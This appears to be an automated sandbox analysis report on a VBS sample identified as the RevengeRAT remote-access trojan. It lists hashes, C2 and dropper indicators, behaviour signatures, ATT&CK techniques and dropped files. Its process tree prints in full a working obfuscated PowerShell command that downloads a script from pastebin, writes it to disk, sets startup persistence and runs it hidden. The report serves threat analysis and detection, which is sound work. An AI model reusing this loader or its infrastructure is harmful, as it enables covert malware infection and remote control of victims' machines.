Overview

overview

10

Static

static

99b9e3b1e0...ee.vbs

windows7_x64

10

99b9e3b1e0...ee.vbs

windows10-2004_x64

10

Analysis

  • max time kernel
    174s
  • max time network
    175s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220112
  • submitted
    19-02-2022 09:01

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    99b9e3b1e096a9e19fbf0eabc7d414045121dc10a2cd825eea5b2ee3465621ee.vbs

  • Size

    135KB

  • MD5

    ee2fb6446ec3ac180286e25365b202b3

  • SHA1

    6bd0bf5b4d0cea86979de7d5b78937c2ff4ee778

  • SHA256

    99b9e3b1e096a9e19fbf0eabc7d414045121dc10a2cd825eea5b2ee3465621ee

  • SHA512

    8e33769206cb7cb5a2655cdc18fba9087bdbfff0de4637d85d5837b36c529ddfb1b69c7424c7d18e38cb8ac106133c9cac2178abc50b8a119f7ae456bac2de27

Score
10/10
revengeratclienttrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://pastebin.com/raw/3mS4sRnV

Extracted

Family

revengerat

Botnet

Client

C2

kimjoy.ddns.net:2021

Mutex

RXQLV8XYTDNHNSA

Signatures

  • RevengeRAT

    Remote-access trojan with a wide range of capabilities.

    trojanrevengerat
  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 49 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\99b9e3b1e096a9e19fbf0eabc7d414045121dc10a2cd825eea5b2ee3465621ee.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2980
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WINDOWSTYLE HIDDEN -EXECUTIONPOLICY UNRESTRICTED -COMMAND IEX ([System.Text.Encoding]::UTF8.GetString(@(35,82,101,97,100,32,67,111,110,116,101,110,116,32,79,102,32,80,111,119,101,114,83,104,101,108,108,32,70,105,108,101,32,33,13,10,91,83,121,115,116,101,109,46,73,79,46,83,116,114,101,97,109,93,32,36,83,116,114,101,97,109,32,61,32,40,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,79,112,101,110,82,101,97,100,40,34,104,116,116,112,115,58,47,47,112,97,115,116,101,98,105,110,46,99,111,109,47,114,97,119,47,51,109,83,52,115,82,110,86,34,41,13,10,91,83,121,115,116,101,109,46,73,79,46,83,116,114,101,97,109,82,101,97,100,101,114,93,32,36,83,82,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,73,79,46,83,116,114,101,97,109,82,101,97,100,101,114,32,36,83,116,114,101,97,109,13,10,91,83,116,114,105,110,103,93,32,36,82,101,113,32,61,32,36,83,82,46,82,101,97,100,84,111,69,110,100,40,41,13,10,13,10,91,83,121,115,116,101,109,46,84,104,114,101,97,100,105,110,103,46,84,104,114,101,97,100,93,58,58,83,108,101,101,112,40,54,48,48,48,41,13,10,13,10,35,67,114,101,97,116,101,32,80,111,119,101,114,83,104,101,108,108,32,70,105,108,101,32,79,110,32,72,97,114,100,32,68,105,115,107,32,33,13,10,91,83,116,114,105,110,103,93,32,36,84,69,77,80,32,61,32,36,101,110,118,58,84,69,77,80,32,43,32,34,92,34,32,43,32,34,83,121,115,84,114,97,121,46,80,83,49,34,13,10,91,83,121,115,116,101,109,46,73,79,46,70,105,108,101,93,58,58,87,114,105,116,101,65,108,108,84,101,120,116,40,36,84,69,77,80,44,32,36,82,101,113,41,13,10,13,10,35,83,116,97,114,116,117,112,32,73,110,115,116,97,108,108,97,116,105,111,110,13,10,70,117,110,99,116,105,111,110,32,73,78,83,84,65,76,76,40,41,32,123,13,10,32,32,32,32,91,83,116,114,105,110,103,93,32,36,86,66,83,82,117,110,32,61,32,91,83,121,115,116,101,109,46,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,68,101,102,97,117,108,116,46,71,101,116,83,116,114,105,110,103,40,64,40,56,51,44,49,48,49,44,49,49,54,44,51,50,44,55,57,44,57,56,44,49,48,54,44,51,50,44,54,49,44,51,50,44,54,55,44,49,49,52,44,49,48,49,44,57,55,44,49,49,54,44,49,48,49,44,55,57,44,57,56,44,49,48,54,44,49,48,49,44,57,57,44,49,49,54,44,52,48,44,51,52,44,56,55,44,56,51,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,44,52,54,44,56,51,44,49,48,52,44,49,48,49,44,49,48,56,44,49,48,56,44,51,52,44,52,49,44,49,51,44,49,48,44,55,57,44,57,56,44,49,48,54,44,52,54,44,56,50,44,49,49,55,44,49,49,48,44,51,50,44,51,52,44,56,48,44,49,49,49,44,49,49,57,44,49,48,49,44,49,49,52,44,56,51,44,49,48,52,44,49,48,49,44,49,48,56,44,49,48,56,44,51,50,44,52,53,44,54,57,44,49,50,48,44,49,48,49,44,57,57,44,49,49,55,44,49,49,54,44,49,48,53,44,49,49,49,44,49,49,48,44,56,48,44,49,49,49,44,49,48,56,44,49,48,53,44,57,57,44,49,50,49,44,51,50,44,56,50,44,49,48,49,44,49,48,57,44,49,49,49,44,49,49,54,44,49,48,49,44,56,51,44,49,48,53,44,49,48,51,44,49,49,48,44,49,48,49,44,49,48,48,44,51,50,44,52,53,44,55,48,44,49,48,53,44,49,48,56,44,49,48,49,44,51,50,44,51,52,44,51,50,44,51,56,44,51,50,44,51,52,44,51,55,44,55,48,44,49,48,53,44,49,48,56,44,49,48,49,44,56,48,44,57,55,44,49,49,54,44,49,48,52,44,51,55,44,51,52,44,52,52,44,51,50,44,52,56,41,41,13,10,32,32,32,32,91,83,121,115,116,101,109,46,73,79,46,70,105,108,101,93,58,58,87,114,105,116,101,65,108,108,84,101,120,116,40,40,91,83,121,115,116,101,109,46,69,110,118,105,114,111,110,109,101,110,116,93,58,58,71,101,116,70,111,108,100,101,114,80,97,116,104,40,55,41,32,43,32,34,92,83,121,115,116,101,109,76,111,103,105,110,51,50,66,105,116,115,56,57,46,118,98,115,34,41,44,32,36,86,66,83,82,117,110,46,82,101,112,108,97,99,101,40,34,37,70,105,108,101,80,97,116,104,37,34,44,32,36,84,69,77,80,41,41,13,10,125,13,10,13,10,91,83,121,115,116,101,109,46,84,104,114,101,97,100,105,110,103,46,84,104,114,101,97,100,93,58,58,83,108,101,101,112,40,49,48,48,48,41,13,10,13,10,35,82,117,110,32,80,111,119,101,114,83,104,101,108,108,32,70,105,108,101,32,33,13,10,73,78,83,84,65,76,76,13,10,73,69,88,32,34,80,111,119,101,114,83,104,101,108,108,46,101,120,101,32,45,87,105,110,100,111,119,83,116,121,108,101,32,72,105,100,100,101,110,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,82,101,109,111,116,101,83,105,103,110,101,100,32,45,70,105,108,101,32,36,84,69,77,80,34)))
      2⤵
      • Blocklisted process makes network request
      • Drops startup file
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1680
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy RemoteSigned -File C:\Users\Admin\AppData\Local\Temp\SysTray.PS1
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3564
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qd3uf0oy\qd3uf0oy.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1460
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB077.tmp" "c:\Users\Admin\AppData\Local\Temp\qd3uf0oy\CSC7AA40A77B20242269F51E85EE1EE2F95.TMP"
            5⤵
              PID:3420
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
            4⤵
              PID:1020
      • C:\Windows\system32\MusNotifyIcon.exe
        %systemroot%\system32\MusNotifyIcon.exe NotifyTrayIcon 13
        1⤵
        • Checks processor information in registry
        PID:3300
      • C:\Windows\System32\svchost.exe
        C:\Windows\System32\svchost.exe -k NetworkService -p
        1⤵
        • Drops file in Windows directory
        • Modifies data under HKEY_USERS
        PID:2488
      • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
        C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
        1⤵
        • Drops file in Windows directory
        • Suspicious use of AdjustPrivilegeToken
        PID:1340

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Initial Access

      Execution

      Persistence

      Privilege Escalation

      Defense Evasion

      Credential Access

      Discovery

      Query Registry

      2
      T1012

      System Information Discovery

      3
      T1082

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Web Service

      1
      T1102

      Impact

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        MD5

        c163ab439d3c5ab9abff81272c463c19

        SHA1

        3f87e709ce5e2b8a4eed5dd1c9f4252549b0b94f

        SHA256

        4dbf858a84ae2a2ff8368e49a188c61d41606da2ce8aece245f70f787029ff5a

        SHA512

        473f1ee75bcd06a2f53b3b4605a4805c9b1fca5b3b87080d9708308a426cb4b8e81543a982f9c94d2fb5a1101f264e0533663cb471035e83e1abf4126d91ec79

        Download Submit
      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        MD5

        9623954de06799ed53f9f40a5a74fc70

        SHA1

        72b5934105dcaf591b42c885b029a4a0256d8e7b

        SHA256

        b9d649868bb3cd32ed1b052c7028dfa413cf50bd02e06dda401f89fd96e31a9c

        SHA512

        2087d1525ba56fc6c713ca18e9ca63b8838307aeadf24f67908697785072fe394d2472bfa0a5eb3d80e09645540befc9671f2723d5caef976dc0e268451ab21c

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\RESB077.tmp
        MD5

        8b16177d13efdcfdbd771711e15ed1a8

        SHA1

        41232d1a185dcd5cba8e66621c20d6fa8a41e046

        SHA256

        a1e16dcbbae38c1cb6666cabc0f4833cddd495fac43d2d7665243bcc83bb0e55

        SHA512

        a35631e33dafa0d2a296591e7e1c0d22252561b4d676b1a55a8dee60ae71361684c5b58009042e591cc1b6864481557243c794bafa33ddf2685d19610ec12028

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\SysTray.PS1
        MD5

        2bd198d265d67c9f4021eca5bb341900

        SHA1

        e3559a0d69e988877ce69d66b69cb41619521272

        SHA256

        721e44289afb034e90a67fb97eb5efd4d469bc95ba9863f16aed5e5909c76c61

        SHA512

        fa00e4b59b41ccbe865d342815001262323db96f99ebd30b1a5728111f9959c2e2775a5f279652649505ad23afe7a5551a705c650b985829cd2690f92f50e8f4

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\qd3uf0oy\qd3uf0oy.dll
        MD5

        f09a7c9a8eec8ac4a2295b88ca0ba7e0

        SHA1

        0ac6cce375bb53818a4ddba018fc0296de440043

        SHA256

        7239c1c4fb39c957bef18bc5375792cab6b4215cdb3696f5cda85f9b56568a12

        SHA512

        51764e8faeb83fbda73ff9833ee84aeb07eb4c688d5b2de2ea9f18491bb6954ccb2dd010c49783b63001ee19058fb3377bd6854eb87af707bf23e88541b6d3d7

        Download Submit
      • \??\c:\Users\Admin\AppData\Local\Temp\qd3uf0oy\CSC7AA40A77B20242269F51E85EE1EE2F95.TMP
        MD5

        4b63037af1071af8799e05c25b21ed30

        SHA1

        076792ad48918fa0991b19d7d7c385100fa96f02

        SHA256

        e71506e10d76cd5f50b1d809a76fdef49ee4356bc982df4e6a915183d35ccb21

        SHA512

        029a815745d08acd040b478ca7e80afb3c65980d91248d0d02c2f4f9d8093a9a177feacdad64986bb0ece7c5aadbcc24611a31993ac8a792584e6745b0bb9044

        Download Submit
      • \??\c:\Users\Admin\AppData\Local\Temp\qd3uf0oy\qd3uf0oy.0.cs
        MD5

        e03b1e7ba7f1a53a7e10c0fd9049f437

        SHA1

        3bb851a42717eeb588eb7deadfcd04c571c15f41

        SHA256

        3ca2d456cf2f8d781f2134e1481bd787a9cb6f4bcaa2131ebbe0d47a0eb36427

        SHA512

        a098a8e2a60a75357ee202ed4bbe6b86fa7b2ebae30574791e0d13dcf3ee95b841a14b51553c23b95af32a29cc2265afc285b3b0442f0454ea730de4d647383f

        Download Submit
      • \??\c:\Users\Admin\AppData\Local\Temp\qd3uf0oy\qd3uf0oy.cmdline
        MD5

        1bd0a6414db5d09cf698f1a8ffe96489

        SHA1

        bcedd72309b67ff35141c3d33e8df7356b466d1d

        SHA256

        50249e12d6a0c8c1b364110502f97903050896624b0aba6b6e6a8d26fe5eef0e

        SHA512

        bac229a1d54e26c174779c8b261eb54134d2f30756a64b350644ea26bff522ff8e10029c5fed3784f747fc0d4f99951c016098b39a8046cd188c62d95d939650

        Download Submit
      • memory/1020-164-0x0000000005590000-0x0000000005B34000-memory.dmp
        Filesize

        5.6MB

        Download
      • memory/1020-163-0x0000000074D9E000-0x0000000074D9F000-memory.dmp
        Filesize

        4KB

        Download
      • memory/1020-158-0x0000000000400000-0x000000000040A000-memory.dmp
        Filesize

        40KB

        Download
      • memory/1680-136-0x000002506A9B3000-0x000002506A9B5000-memory.dmp
        Filesize

        8KB

        Download
      • memory/1680-137-0x000002506ABC0000-0x000002506ABE2000-memory.dmp
        Filesize

        136KB

        Download
      • memory/1680-130-0x00007FFA6C363000-0x00007FFA6C365000-memory.dmp
        Filesize

        8KB

        Download
      • memory/1680-140-0x000002506A9B6000-0x000002506A9B8000-memory.dmp
        Filesize

        8KB

        Download
      • memory/1680-135-0x000002506A9B0000-0x000002506A9B2000-memory.dmp
        Filesize

        8KB

        Download
      • memory/3564-152-0x000001A7EC720000-0x000001A7EC796000-memory.dmp
        Filesize

        472KB

        Download
      • memory/3564-151-0x000001A7EC256000-0x000001A7EC258000-memory.dmp
        Filesize

        8KB

        Download
      • memory/3564-150-0x000001A7EC253000-0x000001A7EC255000-memory.dmp
        Filesize

        8KB

        Download
      • memory/3564-149-0x000001A7EC250000-0x000001A7EC252000-memory.dmp
        Filesize

        8KB

        Download
      • memory/3564-148-0x00007FFA6C363000-0x00007FFA6C365000-memory.dmp
        Filesize

        8KB

        Download